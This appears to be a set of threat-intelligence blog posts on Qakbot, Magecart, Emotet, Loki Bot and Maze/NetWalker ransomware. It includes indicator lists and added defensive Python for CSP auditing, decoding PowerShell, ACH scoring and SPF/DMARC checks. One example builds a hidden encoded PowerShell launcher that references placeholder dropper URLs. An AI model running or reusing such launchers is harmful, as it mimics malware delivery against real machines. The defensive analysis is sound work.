Strong email security processes and user awareness remain paramount to avoid initial infection by similar phishing campaigns, which can lead to very impactful ransomware incidents. Threat feeds can also help detect the often-changing attack infrastructure of botnets like Qakbot by providing up-to-date indicators of compromise for ingestion into security detection systems. In particular, we found that URLhaus’ database is a useful source of Qakbot malware URLs that can aid network defenders.

C2 servers hardcoded in the Qakbot DLL analysed

Note that not all of the IPs below are likely to still be actively used for malicious purposes; apply caution when using them for blocking.


Criminal Shopping Habits

Cyber threats to the retail sector

The retail industry is increasingly gearing towards e-commerce platforms and cashless, even contactless, payments – a trend accelerated by the Covid-19 pandemic.

Even before that, in 2020, 41% of shoppers said they would purchase items online that they would normally go to the store for. In 2019, 53% of Hong Kong residents tried to be completely cashless, according to Visa. The retail and consumer landscape is clearly changing rapidly, and the cyber threats facing the industry are following accordingly.

As payments increasingly move online, so do cybercriminals’ attempts to steal payment card data. Traditional point of sale (POS) malware steals customers’ data by infecting retailers’ POS devices. While still present, POS malware is losing effectiveness due to increasingly secure card standards like EMV and the growing use of contactless payments, including mobile payment systems like Apple Pay and Google Pay.

Consumers’ growing appetite for e-commerce has therefore led criminals to adopt new tactics. One of the most widespread is stealing payment data on e-commerce websites by injecting malicious JavaScript skimmers into checkout pages, a technique known as Magecart.

The growing threat of web skimmers

Magecart is a common and hard-to-detect threat for online retailers. Researchers estimate that one e-commerce website is infected with Magecart malicious code every 15 seconds. Some large-scale Magecart operations have compromised thousands of websites at a time, including about 2000 e-commerce sites in just three days in September. Criminals injected malicious JavaScript code likely via outdated v1 and v2 versions of the Magento e-commerce platform.

Compromise of popular third-party e-commerce platforms like Magento allows criminals to automatically deploy JavaScript skimmers on hundreds of vulnerable victims at the same time. Indeed, the name Magecart itself refers to this common intrusion vector (Magecart = Magento + shopping Cart).

Magecart supply chain compromises are widespread. However, websites can also be targeted in direct operations that exploit existing vulnerabilities. Malicious changes to checkout pages are often minimal and hard to detect: criminals can simply append a few lines of code to a legitimate JavaScript library to avoid detection. A US precious metals retailer this year discovered that Magecart card-stealing code had been present on its website for some five months, likely affecting tens of thousands of customers. The incident highlights the stealth and long-term impact that a Magecart compromise can have on retailers.

Example of Magecart compromise

Human-operated Ransomware

Although customers’ data are a precious criminal commodity, cybercriminals also target retailers’ networks for extortion. Human-operated ransomware, in particular, is among the most impactful and widespread threats that DarkLab analysts have observed targeting Hong Kong organisations in 2020.

This year we helped two prominent Hong Kong retailers respond to network compromises by the Maze and Netwalker ransomware families. As is increasingly common among ransomware operators, the retailers were threatened with data leaks on top of the data-encryption coercion. For retailers that process a significant amount of customer data, a data leak can present significant reputational and regulatory concerns, not to mention the operational impact that widespread encryption of systems can cause.

As we previously reported, ransomware operators often exploit known vulnerabilities in victims’ external IT estates (including SSLVPN appliances) and exposed remote access services like RDP. However, large-scale phishing campaigns like those of Emotet can also result in ransomware deployment. A specialist news outlet recently highlighted how most malware infections – even from unknown or low-level variants – should be treated as potential ransomware incidents due to the growing popularity of initial access brokers’ malware services.

Business email compromise remains a concern

DarkLab also observed companies in the retail sector falling victim to another widespread threat, business email compromise. The international supply chain that Hong Kong retailers rely on makes them a target for fraudsters looking to impersonate distant third parties to misappropriate funds. As working-from-home arrangements become more prevalent, fraudsters are also looking to hijack communications between two employees in the same territory. The lack of physical interaction between employees makes email fraud easier.

To do so, fraudsters adopt ingenious social engineering techniques. These include passively monitoring email exchanges from a compromised email account while modifying only a few selected details – like bank account details. Employees may not realise their communications have been compromised until it is too late.

Strict rules for unusual bank transfers, as well as good email security hygiene, can help prevent, or at least detect, these kinds of incidents.

Opportunistic attacks are more than a nuisance

Some attacks can be less sophisticated than others but still require lengthy and cumbersome responses. For instance, DarkLab is aware of a retailer operating in Hong Kong that was recently infected in a likely automated fashion by a self-spreading crypto miner. The malware exploited an exposed RDP server, but was quickly detected by the victim’s security system. Nonetheless, time and resources had to be spent to conduct a thorough systems audit to ascertain the extent of the intrusion.

Similarly, data breaches can expose large amounts of customer data and pose a significant threat despite the perceived lack of attacker sophistication. In September, a threat actor on a popular hacking forum released almost 3 million customer records from an online hospitality company with operations in Hong Kong, Singapore and Malaysia.[1] Although technical details of the breach are unclear, similar incidents often see criminals exploiting relatively unsophisticated techniques like SQL injection and exploitation of known vulnerabilities.

A thorough review of your online footprint and implementation of basic cyber security hygiene can help prevent such opportunistic attacks.

Conclusion and mitigation

The global COVID-19 pandemic has led to an uptick in cybercrime across all sectors. However, the ongoing sales and the coming Christmas season are likely to see retailers particularly targeted, as public health restrictions force customers to rely on e-commerce platforms for purchasing products of all kinds.

With the holiday season coming into full swing, the volume of online purchases is likely to be at an all-time high. While there are clear opportunities for retailers to enjoy returns on a digital-focused business model, threat actors are also looking to exploit the techniques described above for their own malicious purposes.

Based on DarkLab’s experience in helping retail clients respond to network intrusions and uplift their security posture, we recommend that organisations:

  • Enforce multi-factor authentication on all remote access services, including VPN, RDP and cloud environments.
  • Ensure ongoing visibility over all external-facing assets, and conduct regular vulnerability scans on external IP addresses.
  • Ensure mail filtering is in place to block inbound email that fails SPF, DKIM or DMARC checks.
  • Conduct regular security reviews of third-party code running on sensitive web pages such as checkout pages.
  • Enforce a Content Security Policy and regularly review which domains can access your site and which resources they are allowed to load. This can help stop Magecart code exfiltrating customers’ data from your site.
  • Consider adopting compliance as code to ensure breaches of pre-established security measures are automatically detected and stopped.
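The last two recommendations can be checked mechanically. The following Python is an added example, not DarkLab’s code: it lists the scripts a checkout page loads, compares them against the page’s Content-Security-Policy and flags the settings a skimmer would slip through. The checkout HTML, the hostnames and both policies are constructed placeholders, and CSP source matching is simplified to hosts (scheme, port and path are ignored).

```python
"""Audit the scripts a checkout page loads against its Content-Security-Policy
and flag policy settings a Magecart-style skimmer would slip through.

Added example, not DarkLab's code. The checkout HTML, the two policies and
every hostname are constructed placeholders. CSP source matching is simplified
to hosts (scheme, port and path matching are ignored).
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and count non-empty inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = 0
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline_script = True

    def handle_data(self, data):
        if self._in_inline_script and data.strip():
            self.inline += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def parse_csp(header):
    """Return {directive: [source tokens]} from a CSP header value."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def source_matches(source, host, page_host):
    """Does one CSP host-source allow a script served from `host`?"""
    if source == "'self'":
        return host == page_host
    if source == "*":
        return True
    if "://" in source:
        source = urlparse(source).hostname or ""
    source = source.lower()
    if source.startswith("*."):
        return host.endswith(source[1:])
    return host == source


def audit_checkout(html, csp_header, page_host):
    """Return scripts the policy would block (unknown third-party code to
    review) and policy weaknesses that would let injected code run or post
    card data to an attacker host regardless."""
    collector = ScriptCollector()
    collector.feed(html)
    policy = parse_csp(csp_header)
    script_src = policy.get("script-src") or policy.get("default-src") or []
    connect_src = policy.get("connect-src") or policy.get("default-src") or []
    findings = {"blocked": [], "weak": []}
    for src in collector.external:
        host = (urlparse(src).hostname or page_host).lower()
        if not any(source_matches(s, host, page_host) for s in script_src):
            findings["blocked"].append(src)
    if not script_src:
        findings["weak"].append("no script-src or default-src: any script may load")
    if "*" in script_src:
        findings["weak"].append("script-src * allows scripts from any host")
    if "'unsafe-inline'" in script_src and collector.inline:
        findings["weak"].append("'unsafe-inline' lets an injected inline skimmer run")
    if not connect_src or "*" in connect_src:
        findings["weak"].append("connect-src unrestricted: card data can be posted anywhere")
    return findings


PAGE_HOST = "shop.example"
# Constructed checkout page: two expected scripts plus one appended from an
# unrecognised host, the pattern the article describes for skimmer injection.
CHECKOUT_HTML = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://js.payments.example/v1.js"></script>
<script>window.checkout = {step: 'payment'};</script>
<script src="https://cdn-static-assets.example/jquery.min.js"></script>
</head><body><form id="card"></form></body></html>
"""
WEAK_CSP = "default-src 'self'; script-src * 'unsafe-inline'"
FIXED_CSP = ("default-src 'self'; script-src 'self' https://js.payments.example; "
             "connect-src 'self' https://api.payments.example; form-action 'self'")

if __name__ == "__main__":
    for label, csp in (("weak", WEAK_CSP), ("fixed", FIXED_CSP)):
        print(label, audit_checkout(CHECKOUT_HTML, csp, PAGE_HOST))
```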

Researching Emotet in Hong Kong

How spam campaigns can threaten regional transport hubs

Emotet is among the most widespread cybercriminal campaigns to date. Originally developed as a banking trojan to steal victims’ banking credentials, it eventually evolved into a vehicle for spreading third-party malware via large spam campaigns. Emotet developers have been collaborating for months with those of Trickbot and Qakbot to deliver ransomware, which means that an Emotet infection would likely lead to widespread system unavailability.

The most recent wave of Emotet emerged in July, and in September it was reportedly sending large amounts of spam emails to Japan and New Zealand, among other target countries.

DarkLab researchers found evidence that between August and September Emotet also targeted organisations in Hong Kong, a region not previously reported as affected by this threat.

According to phishing emails uploaded to a popular malware repository, organisations in the retail, transport and telecommunications sectors were among Emotet’s targets, although more companies are likely to have received its malicious emails.

Among the targets identified, the presence of Hong Kong’s main airport is particularly worrying. The organisation was very likely not compromised, or it would not have uploaded the phishing email to a malware repository, but as Emotet often leads to ransomware, a successful infection would likely have had a serious impact on one of the largest airports in Asia Pacific.

Figure 1 – screenshot of Emotet phishing email to a Hong Kong victim

Attack chain analysis

DarkLab analysts observed that the emails were sent by Emotet’s epoch2 botnet, abusing or spoofing previously compromised organisations in other countries. The phishing emails contain MS Word attachments with relatively generic filenames such as invoice.doc and MJ-1759 report.doc. Upon opening the document, the user is enticed to click an “Enable Content” button, a standard technique to activate malicious macros.

Figure 2 – screenshot of MJ-1759 report.doc (MD5:e1b8b7b710a639b0697a5f3b5e6a00bb)

The heavily obfuscated malicious macros then load a base64-encoded PowerShell script into memory, which is used to download an executable from one of seven hardcoded URLs. Multiple dropper sites ensure successful malware delivery even if one or more of the malicious sites are taken down.

Figure 3 – decoded and partially deobfuscated PowerShell script reveals the dropper URLs (highlighted)
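As an added triage example (not DarkLab’s code and not the campaign’s script), the following Python decodes a base64 PowerShell launcher of the kind described above and extracts the URLs it references, defanged for reporting. The command line and the dropper domains are constructed placeholders.

```python
"""Decode an Emotet-style base64 PowerShell launcher and list its dropper URLs.

Added triage helper, not DarkLab's code. The command line is constructed and
the dropper domains are placeholders, not the campaign's real infrastructure.
"""
import base64
import re

# -EncodedCommand and its abbreviations (-enc, -e) followed by base64 text.
ENC_FLAG = re.compile(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"`,;)]+")


def decode_encoded_command(cmdline):
    """Return the decoded script, or None if nothing encoded is present.
    PowerShell expects the base64 to wrap UTF-16LE text, not UTF-8."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def defang(url):
    """Rewrite http(s)://host/path as hxxp(s)://host[.]tld/path, the
    convention the IOC list below uses, so the indicator is not clickable."""
    scheme, rest = url.split("://", 1)
    host, slash, path = rest.partition("/")
    return scheme.replace("tt", "xx") + "://" + host.replace(".", "[.]") + slash + path


def extract_dropper_urls(script):
    """Unique URLs in first-seen order, defanged for reporting."""
    seen = []
    for url in URL_RE.findall(script):
        if url not in seen:
            seen.append(url)
    return [defang(u) for u in seen]


def triage(cmdline):
    """None when the command line carries no encoded script, otherwise the
    decoded script and the URLs it references."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None
    return {"script": script, "urls": extract_dropper_urls(script)}


# Constructed sample: the launcher shape described above (hidden window, no
# profile, encoded body) with a benign body that only declares URL strings.
SAMPLE_SCRIPT = (
    "$urls = 'http://dropper-one.example/wp-includes/AbCd1/,"
    "http://dropper-two.example/cgi-bin/Xy2/,"
    "http://dropper-one.example/wp-includes/AbCd1/'.Split(',')\n"
    "Write-Output $urls.Count"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_CMDLINE = "powershell.exe -NoP -w hidden -enc " + SAMPLE_B64

if __name__ == "__main__":
    for url in triage(SAMPLE_CMDLINE)["urls"]:
        print(url)
```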

This first-stage payload, which can have different names in different samples analysed, is by default saved in %TEMP%\APPDATA or USERFOLDER. When the first-stage executable is run it gains persistence by copying itself to the system root folder under a different name, and by modifying registry entries to ensure that the process runs every time the endpoint boots. The new executable in the system root is the actual Emotet payload, named kbdrost.exe, and reaches out to a command and control server via an HTTP POST request.

Figure 4 – Emotet’s connection to remote C2 IP following successful infection

According to previously observed behaviour, Emotet will eventually drop the Trickbot or Qakbot trojans, which will then deliver the Ryuk or Prolock ransomware respectively.

Emotet’s large spam campaigns and relatively sophisticated delivery mechanisms are likely to continue to pose a threat to companies in Asia Pacific in the foreseeable future. DarkLab’s discovery of Emotet’s targeting of Hong Kong organisations shows how companies in the region should maintain awareness of global threat trends to ensure effective network defences and a proactive approach to cyber security.

Indicators of Compromise

The following IOCs relate to the samples analysed, including the hardcoded C2 IP addresses. However, Emotet’s attack infrastructure changes rapidly. We suggest readers refer to Cryptolaemus’ daily IOC lists for an updated and comprehensive overview of Emotet’s infrastructure.

Filename            SHA-256 hash
MJ-1759 report.doc  5a378819ab9e17bc93ed9c3d01b31f2b1ff6c39cb3cbaff66933fe096a527450
kbdrost.exe         9f9ac55291000f55721ff0fcf8fd421d94eb0e2f0259c161a8d17b2cb0894fa0
Executable dropper URLs

C2 IPs


A tale of two hacks

A case study in structured intelligence analysis

In recent weeks DarkLab helped a large international company conduct a threat hunting exercise in their infrastructure following a network breach.

The initial investigations revealed that threat actors infiltrated the network using legitimate and likely stolen credentials on a Citrix server hosted in a European subsidiary of our client. From there, however, the DarkLab team discovered two sets of activities. One led to the exfiltration of large amounts of data, the other to the deployment of the REvil ransomware, also known as Sodinokibi. We previously reported on how ransomware operators are increasingly stealing data from their victims to threaten its release if their ransom demands are not met. It therefore seemed possible that the two sets of malicious activities were carried out by the same threat actor.

Indeed, the initial entry point was the same, and the stolen data was uploaded to Mega, a popular file hosting site previously used by REvil operators. However, other aspects of the malicious actions did not add up. For instance, data was exfiltrated weeks after the ransomware was deployed, which would be inconsistent with previously observed tactics, techniques and procedures (TTPs) of ransomware operators. Also, the activities that led to ransomware deployment and those that ended in data theft used commonly seen but different toolsets. While in one incident Cobalt Strike was used as the attack tool on day one, the other set of activities involved PsExec the day after. Since Cobalt Strike has PsExec functionality built in, we began to doubt whether the two incidents were carried out by the same attacker.

Assessing pieces of conflicting evidence can be messy and can lead to the wrong conclusion. In order to analyse the existing evidence in an unbiased and objective manner, DarkLab analysts resolved to employ a traditional technique used by intelligence professionals since the 1960s. Despite its age, the Analysis of Competing Hypotheses (ACH) remains a useful framework for answering difficult questions in a way that removes analysts’ potential biases or misconceptions.

Our analysts created a table like the one below, where each piece of evidence is given a credibility and a relevance score before its consistency with each hypothesis is evaluated. The hypothesis with the highest score is considered the most likely.

In our case we considered the following hypotheses:

H1: Incidents 1 and 2 were carried out by the same attacker

H2: Incidents 1 and 2 were carried out by two different attackers

H3: Incidents 1 and 2 were carried out by more than two attackers

Fig 1 – ACH table

By rating the evidence collected as consistent (C), not applicable (N) or inconsistent (I) with each of the hypotheses, a final score is calculated. H2 scored the highest, indicating it was clearly the most likely hypothesis. This suggested that different threat actors were indeed separately involved in the ransomware deployment and the data exfiltration.
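The scoring the article describes, as an added example rather than DarkLab’s own matrix or tool: each piece of evidence is weighted by credibility and relevance, rated C, N or I against every hypothesis, and the hypotheses are ranked by total. The weighting scheme (credibility times relevance; C = +1, N = 0, I = -1) and the numeric scores are constructed assumptions; the evidence items restate facts given in the article.

```python
"""Analysis of Competing Hypotheses (ACH), scored the way the article describes.

Added example, not DarkLab's tool or their actual matrix. Assumptions: weight
= credibility x relevance, and a rating of C counts +weight, N counts 0 and
I counts -weight. The numeric scores below are constructed; the evidence
descriptions restate facts given in the article.
"""
from dataclasses import dataclass

RATING_VALUE = {"C": 1, "N": 0, "I": -1}


@dataclass
class Evidence:
    description: str
    credibility: int  # 1 (low) to 5 (high): how much the observation is trusted
    relevance: int    # 1 (low) to 5 (high): how diagnostic it is for the question
    ratings: dict     # hypothesis id -> "C", "N" or "I"

    @property
    def weight(self):
        return self.credibility * self.relevance


def score_hypotheses(hypotheses, evidence):
    """Return {hypothesis: weighted total}; an unrated cell counts as N."""
    totals = {h: 0 for h in hypotheses}
    for item in evidence:
        for h in hypotheses:
            rating = item.ratings.get(h, "N")
            if rating not in RATING_VALUE:
                raise ValueError(f"bad rating {rating!r} for {h}")
            totals[h] += item.weight * RATING_VALUE[rating]
    return totals


def rank(totals):
    """Hypothesis ids from most to least likely."""
    return sorted(totals, key=totals.get, reverse=True)


def non_diagnostic(hypotheses, evidence):
    """Evidence rated identically against every hypothesis cannot separate
    them; ACH practice is to drop or down-weight such items."""
    return [e.description for e in evidence
            if len({e.ratings.get(h, "N") for h in hypotheses}) == 1]


HYPOTHESES = {
    "H1": "same attacker",
    "H2": "two different attackers",
    "H3": "more than two attackers",
}

# Constructed matrix built from the facts stated in the article.
EVIDENCE = [
    Evidence("Same initial entry point (Citrix server, stolen credentials)",
             5, 2, {"H1": "C", "H2": "C", "H3": "C"}),
    Evidence("Stolen data uploaded to Mega, previously used by REvil operators",
             4, 2, {"H1": "C", "H2": "N", "H3": "N"}),
    Evidence("Data exfiltrated weeks after the ransomware was deployed",
             5, 5, {"H1": "I", "H2": "C", "H3": "C"}),
    Evidence("Cobalt Strike on day one, standalone PsExec the day after",
             4, 4, {"H1": "I", "H2": "C", "H3": "C"}),
    Evidence("Ransomware wiped out the other intruder's callbacks on 10 hosts",
             5, 3, {"H1": "I", "H2": "C", "H3": "C"}),
    Evidence("Only two distinct toolsets and two timelines were observed",
             3, 4, {"H1": "N", "H2": "C", "H3": "I"}),
]

if __name__ == "__main__":
    totals = score_hypotheses(HYPOTHESES, EVIDENCE)
    for h in rank(totals):
        print(f"{h} ({HYPOTHESES[h]}): {totals[h]}")
    print("non-diagnostic:", non_diagnostic(HYPOTHESES, EVIDENCE))
```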

In this way, we were able to use a fact-based, objective analysis of the available intelligence to our advantage in a live threat hunting exercise. In particular, our threat hunting team was able to treat the incidents as separate, with significant implications for their efforts in detecting and mitigating the breaches.

Further details on the incidents

Our forensic investigation established that the ransomware attack lasted a total of five days, while the threat actor that stole the data was able to remain undetected in the network for almost six weeks. In both cases, the number of hosts compromised was significant and the threat actors were able to move across different countries’ networks without being detected.

The REvil operator used the legitimate remote access solution AnyDesk as a backdoor, and eventually deployed the ransomware to over 1000 servers and workstations in Hong Kong and the UK. Ironically, the ransomware interfered with the callbacks the second attacker had already established on 10 machines: all their call-back connections on the compromised servers were gone after the ransomware attack. They were therefore forced to restart from the initially compromised Citrix server in the UK. From there, they used Cobalt Strike for lateral movement and privilege escalation on multiple accounts in Hong Kong, the US and India. This second attacker collected hundreds of gigabytes of data from different servers, staged them internally, compressed them, and eventually uploaded them to a Mega cloud server.

Mitigation

The presence of two separate attackers within the network of a large conglomerate indicates the significant challenges that large organisations with tens of thousands of endpoints can face. Deploying standard policies on such a large estate can be challenging, but we strongly suggest that organisations:

  • Enable multi-factor authentication (MFA) for all remote access
  • Enforce strong password policies, proper Active Directory-based mechanisms, or a managed password solution to protect Domain Administrator accounts
  • Tighten cloud file storage usage; some solutions offer built-in micro-segmentation that can help prevent attackers from accessing your data
  • Consider employing Managed Detection and Response services to automatically and proactively mitigate threats on a 24/7 basis

Indicators of Compromise

Host-based

Filename     MD5                               Description
payload.txt  f5dd8644b011a6ecaf405ee9bc5c6852  Cobalt Strike implant callback
beac.exe     500286eaf9eb11b34eb413bb0df5543b  Cobalt Strike implant callback
55.exe       500286eaf9eb11b34eb413bb0df5543b  Ransomware
Beta.exe     90e6ea15ed18005b431e135186d57abf  Ransomware

Network-based

Value              Description
82.31.145[.]121    Infiltration IP
94.7.101[.]89      Infiltration IP
158.174.247[.]194  Infiltration IP
212.80.217[.]174   Call-back IP
51.83.165[.]21     Call-back IP
fairyschool[.]art  C2 domain for baec.exe

Phishing Vessels

Loki Bot campaign targets maritime industry

DarkLab intelligence analysts detected a Loki Bot phishing campaign targeting the maritime and engineering sectors in Europe, Asia and the US from spoofed email addresses of legitimate organisations in Asia.

Figure 1 – Countries of origin of phishing recipients (blue) and legitimate organisations’ spoofed addresses (red)

Recipients of phishing emails – hard to see in the map above – were also located in Singapore.

The earliest phishing email detected dates back to October 2019. However, our previous research indicates that this threat actor has been using maritime themes in their phishing campaigns since at least 2018, and is linked to other malware families including Pony.

The 2019 email was sent from a likely compromised subdomain of an Indonesian company and contained a malicious archive (.rar) attachment purportedly pertaining to a purchase order, a common theme of spam emails.

Since then, the actor behind the campaign refocused their phishing lures by spoofing emails of legitimate organisations linked to the maritime industry, and by referring to vessels and other naval themes in their emails.

Figure 2 – Example of phishing email spoofing a Singapore-based shipping company

Figure 3 – Example of phishing email sent to a Switzerland-based maritime consultancy

Some phishing emails showed a good knowledge of the shipping industry, including believable details of existing ships and port locations.

Figure 4 – Example of phishing email sent to a Japanese shipping company

Figure 4 – Example of phishing email sent to an Italian engineering contractor, purporting to be from a Chinese port authority

For instance, both vessels mentioned in the email above, Glovis Crown and Glovis Splendor, are 200m long cargo ships registered in the Marshall Islands. It remains unclear how criminals managed to obtain such details, although it seems likely that they derive from previously hijacked communications of potentially unrelated victims.

This second wave of phishing emails has been active between February and late June 2020, suggesting the campaign is likely still active.

Phishing emails switched to a malicious Microsoft Excel (.xlsx) attachment containing an exploit for CVE-2017-11882. This vulnerability in Microsoft Equation Editor lets attackers run remote code on a vulnerable machine when the victim opens a document. The exploit has been actively used by multiple cybercriminal groups due to the level of access it grants to the victim machine and the lack of user interaction needed.

Figure 5 – Screenshot of malicious xlsx attachment to email in Figure 4 [MD5: e7bb1284bf0e723b47435b0f70504b3f]

The malicious documents are downloaders for Loki Bot, an information stealer first seen in 2015. The malicious payloads observed, and additional ones found by pivoting on the attack infrastructure, are downloaded from duckdns.org subdomains likely created with domain generation algorithms (DGA).

The payload, Loki Bot, can steal credentials from browsers and email clients, among other programs, and has keylogging capabilities. The malware also sends identifying information about the victim’s host to a C2 to inform threat actors of the successful infection.

The current Loki Bot campaign highlights the ongoing threat of commodity malware and widespread phishing to organisations in the maritime and engineering sectors. Although the campaign exploits well-known threat vectors, the lack of widespread adoption of anti-spoofing technologies like SPF and DMARC, or their incorrect implementation, means that criminals can continue sending credible phishing emails apparently from legitimate domains.
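An added example (not DarkLab’s code) of how SPF and DMARC settings decide the fate of a message spoofing a domain: given constructed TXT records, it reports whether a receiver enforcing DMARC would deliver, quarantine or reject mail sent from an IP the SPF record does not list and carrying no valid DKIM signature. The records and domain names are constructed placeholders.

```python
"""Would a domain's SPF and DMARC records stop mail spoofing that domain?

Added example, not DarkLab's code. The records are constructed and the model
is deliberately simple: the spoofer sends from an IP the SPF record does not
list and cannot produce a valid DKIM signature, so the outcome hinges on the
SPF 'all' qualifier and the DMARC policy, the two settings most often wrong.
"""


def parse_spf(record):
    """Return the qualifier ('+', '-', '~' or '?') of the record's 'all'
    mechanism, or None when the record is missing or has no 'all' term."""
    if not record or not record.lower().startswith("v=spf1"):
        return None
    for term in record.split()[1:]:
        qualifier, mech = (term[0], term[1:]) if term[0] in "+-~?" else ("+", term)
        if mech.lower() == "all":
            return qualifier
    return None


def parse_dmarc(record):
    """Return DMARC tags as a dict, or {} when the record is missing or invalid."""
    if not record or not record.strip().lower().startswith("v=dmarc1"):
        return {}
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip().lower()
    return tags


def spoof_disposition(spf_record, dmarc_record):
    """Return (disposition, reason) a DMARC-enforcing receiver would reach for
    a spoofed message: 'deliver', 'quarantine' or 'reject'."""
    spf_all = parse_spf(spf_record)
    dmarc = parse_dmarc(dmarc_record)
    if spf_all == "+":
        # +all authorises every sender, so the spoofer passes SPF and, with an
        # aligned From domain, passes DMARC as well.
        return "deliver", "SPF '+all' passes any sender, so DMARC passes too"
    if not dmarc:
        return "deliver", "no DMARC record: an SPF fail alone is advisory"
    policy = dmarc.get("p", "none")
    if policy not in ("quarantine", "reject"):
        return "deliver", "DMARC p=none only reports, it does not enforce"
    try:
        pct = int(dmarc.get("pct", "100"))
    except ValueError:
        pct = 100
    if pct < 100:
        return policy, f"enforced for only {pct}% of failing mail (pct={pct})"
    spf_state = f"SPF '{spf_all}all' fails" if spf_all else "no SPF pass possible"
    return policy, f"{spf_state}, no DKIM, DMARC p={policy}"


# Constructed records: the weak pair beside the corrected pair.
WEAK_SPF = "v=spf1 include:_spf.mailprovider.example +all"
WEAK_DMARC = "v=DMARC1; p=none; rua=mailto:dmarc@shipping.example"
FIXED_SPF = "v=spf1 include:_spf.mailprovider.example -all"
FIXED_DMARC = "v=DMARC1; p=reject; pct=100; rua=mailto:dmarc@shipping.example"

if __name__ == "__main__":
    for label, spf, dmarc in (("weak", WEAK_SPF, WEAK_DMARC),
                              ("fixed", FIXED_SPF, FIXED_DMARC)):
        print(label, spoof_disposition(spf, dmarc))
```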

Indicators of Compromise

Email sender’s IP

103.253.115[.]37

Downloader Domains


Payloads


Crypt ‘n’ Leak

New ransomware trend exploits vulnerability in Hong Kong’s VPNs

The fast pace of criminal innovation is an ever-recurring theme in cyber security. When the cybercriminal underground economy is particularly saturated, threat actors are likely to explore new ways to differentiate their offering in the illicit market and increase revenue. This is what we are currently observing among ransomware operators. Many ransomware variants have been released in recent years. In the last several months, however, a smaller group of ransomware-as-a-service providers has emerged with a new tactic to extort their victims.

DarkLab’s Threat Intelligence team is currently tracking multiple ransomware groups that, in addition to encrypting victims’ data, also steal sensitive files and threaten their public release if ransom demands are not met. The extortionists’ goal is to apply additional pressure on victims by threatening reputational damage and potential regulatory fines if sensitive data is leaked, on top of hindering systems availability.

DarkLab’s incident response team has observed multiple such incidents affecting Hong Kong organisations, highlighting how ransomware leak attacks are a significant and current threat for companies in the region as well as globally. DarkLab has experience in dealing with Maze and NetWalker ransomware attacks in Hong Kong. This article aims first to shed light on each malware’s background, and then to discuss some of the tactics, techniques, and procedures (TTPs) we observed in our incident response investigations.

The RaaS model and its implications

Maze and NetWalker ransomware variants are developed by a core group of cybercriminals and then leased to other criminal operators, called affiliates, on deep and dark web forums. This model is usually referred to as ransomware-as-a-service (RaaS), where operators and developers share profits in an agreed percentage.

RaaS means that different operators of the same ransomware group can target multiple companies at the same time, regardless of their size or geographical location. Ransomware operators are independent actors, so the tactics they use may differ. This makes the job of network defenders more challenging because of the larger set of potential tactics, techniques, and procedures (TTPs) to mitigate.

Some RaaS developers, like those of NetWalker, only accept affiliates with proven technical skills and existing access to multiple corporate networks. Stricter screening of cybercriminal candidates is leading to an increase in targeted ransomware attacks exploiting external network systems. Exposed remote desktop protocol (RDP) and vulnerable internet-facing services are increasingly likely entry points, more so than untargeted phishing emails.

The rise of crypt and leak

Since the end of 2019, some ransomware groups have begun threatening to release sensitive victim data if their ransom demands are not met. Maze went a step further and set up a dedicated website to publicly shame victims and leak data. More groups, including NetWalker, are now maintaining their own leak websites on the clearnet or as Tor hidden services. DarkLab is currently tracking 13 ransomware leak websites, highlighting the rapidly increasing scale of this crypt and leak trend.

This new pressure tactic by ransomware operators has significant implications for companies. Previously, an efficient back-up policy would potentially guarantee a timely recovery from ransomware attacks. Now that ransomware groups also leak data, back-ups are not enough anymore. Organisations must ensure that sound cyber security hygiene is maintained at all times to prevent a ransomware intrusion from taking place at all.

Maze

Maze ransomware appeared in May 2019, but it began leaking victims’ data only in 2020. The group maintains two sites, one to publish victim data (see figure 1), the other to communicate with its victims and let them decrypt some test files (see figure 2). Both have a back-up Tor hidden service counterpart to avoid takedown by law enforcement.

Figure 1 – redacted screenshot of Maze ransomware leak site

Figure 2 – Screenshot of Maze ransomware chat site

Figure 3 – Geography of Maze’s victims posted on their site

Figure 4 – Sectorial breakdown of Maze’s victims posted on their site

NetWalker

NetWalker ransomware is based on a previous variant called Mailto and was rebranded under its current name in March 2020, despite little change in its code. The developers of NetWalker recruit affiliates on Russian-language cybercriminal forums and particularly look for individuals with network intrusion experience. The group has allegedly been very successful since its inception. NetWalker developers claimed to have earned millions of US dollars since March, although it remains unclear whether this is an exaggeration to attract more affiliates to their program.

NetWalker also operates a website that lists their victims and leaks their data. We noticed that the group behind NetWalker selectively deletes victims’ entries from the website over time, so the range of targeted organisations is likely more extensive than that presented in the graphs below.

Figure 5 – Redacted screenshot of NetWalker ransomware leak site

Figure 6 – Geographical breakdown of NetWalker’s victims posted on their site, more have likely been targeted and not posted online or deleted from existing victims’ list

Figure 7 – Sectorial breakdown of NetWalker’s victims posted on their site, more sectors have likely been targeted

Observed tactics, techniques, and procedures

DarkLab incident response investigations found that operators of both Maze and NetWalker exploited a known Pulse Secure VPN vulnerability – CVE-2019-11510 – to gain initial access to victims in Hong Kong. The same vulnerability has been exploited by multiple ransomware groups against other high-profile targets, including by Sodinokibi against Travelex in January.

In both cases, the SSLVPN remote access technology was Active Directory (AD) authenticated, giving attackers a legitimate network account early on in their intrusion. Once inside the victim’s network, the attackers conducted enumeration and other reconnaissance activities by, for instance, searching for password files in shared folders. The attackers also actively looked for idle and vulnerable servers with the intention of expanding their foothold.

